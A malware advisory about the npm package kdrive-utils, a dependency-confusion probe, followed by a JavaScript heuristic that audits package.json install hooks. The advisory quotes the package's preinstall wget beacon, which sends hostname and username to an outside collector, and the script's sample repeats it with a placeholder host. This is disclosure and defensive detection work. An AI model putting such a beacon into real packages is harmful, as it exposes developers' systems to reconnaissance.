MAL-2026-6295

Malicious code in kdrive-utils (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (3e7d5af5ddf22d4481fca4847a45189e6160a723341b32dcbb6bf51b49f53943)

package.json declares a preinstall lifecycle script that auto-executes on `npm install` and runs `wget -q -O- "http://d8svb0ao12pnoovdaih0giunhdew5oqa4.oast.live/$(hostname)/$(whoami)"`. The installer's hostname and current OS username are embedded directly into the request path and sent over plain HTTP to an oast.live (Interactsh / out-of-band application security testing) listener — an attacker-controlled DNS/HTTP collector commonly used for supply-chain reconnaissance and typosquat/dependency-confusion probes. The package is an unscoped name published at version 99.9.9, which is the canonical dependency-confusion shape (high version number to win resolution against an internal package of the same name). No legitimate functionality is shipped beyond the beacon.
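A defensive check for the pattern described above, as an added example that is not part of the original advisory or of any scanner's code: it flags install-time lifecycle scripts that call a network tool, use plain HTTP, or embed `hostname`/`whoami` in a command substitution, and flags an unscoped name with an inflated major version. The rule names, the major-version threshold of 99, the tool list and both sample manifests (including the placeholder host and the `@acme` scope) are assumptions constructed for illustration.

```javascript
// Lifecycle hooks that npm runs automatically during `npm install`.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];

// Heuristics derived from the advisory text; lists and thresholds are assumptions.
const NETWORK_TOOL = /\b(wget|curl|nslookup|dig|nc)\b/i;
const PLAIN_HTTP = /\bhttp:\/\//i;
const HOST_IDENTITY = /\b(hostname|whoami|id|uname)\b/;
const SUSPICIOUS_MAJOR = 99; // assumed cut-off for an "inflated" version

// Returns a list of finding labels for a parsed package.json object.
function auditManifest(manifest) {
  const findings = [];
  const scripts = manifest.scripts || {};
  for (const hook of INSTALL_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== "string") continue;
    if (NETWORK_TOOL.test(cmd)) findings.push(`${hook}:network-tool`);
    if (PLAIN_HTTP.test(cmd)) findings.push(`${hook}:plain-http`);
    // Collect $(...) and `...` substitutions and look for host/user lookups.
    const subs = cmd.match(/\$\([^)]*\)|`[^`]*`/g) || [];
    if (subs.some((s) => HOST_IDENTITY.test(s))) {
      findings.push(`${hook}:host-identity-in-command`);
    }
  }
  // Unscoped name plus very high major version: dependency-confusion shape.
  const name = String(manifest.name || "");
  const major = parseInt(String(manifest.version || "0").split(".")[0], 10);
  if (!name.startsWith("@") && major >= SUSPICIOUS_MAJOR) {
    findings.push("unscoped-inflated-version");
  }
  return findings;
}

// Constructed sample shaped like the package described above (placeholder host).
const SAMPLE_SUSPECT = {
  name: "kdrive-utils",
  version: "99.9.9",
  scripts: {
    preinstall: 'wget -q -O- "http://collector.example.invalid/$(hostname)/$(whoami)"',
  },
};
// Constructed benign manifest: scoped name, ordinary version, local build step.
const SAMPLE_BENIGN = {
  name: "@acme/kdrive-utils",
  version: "1.4.2",
  scripts: { postinstall: "node scripts/build.js", test: "jest" },
};

console.log(auditManifest(SAMPLE_SUSPECT));
console.log(auditManifest(SAMPLE_BENIGN));
```

Run it over manifests extracted from a registry tarball before installation, since a preinstall hook has already executed by the time the package is on disk under `node_modules`.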

Affected packages

npm / kdrive-utils

No fixed version published yet for kdrive-utils (npm). Pin to a known-safe version or switch to an alternative.

References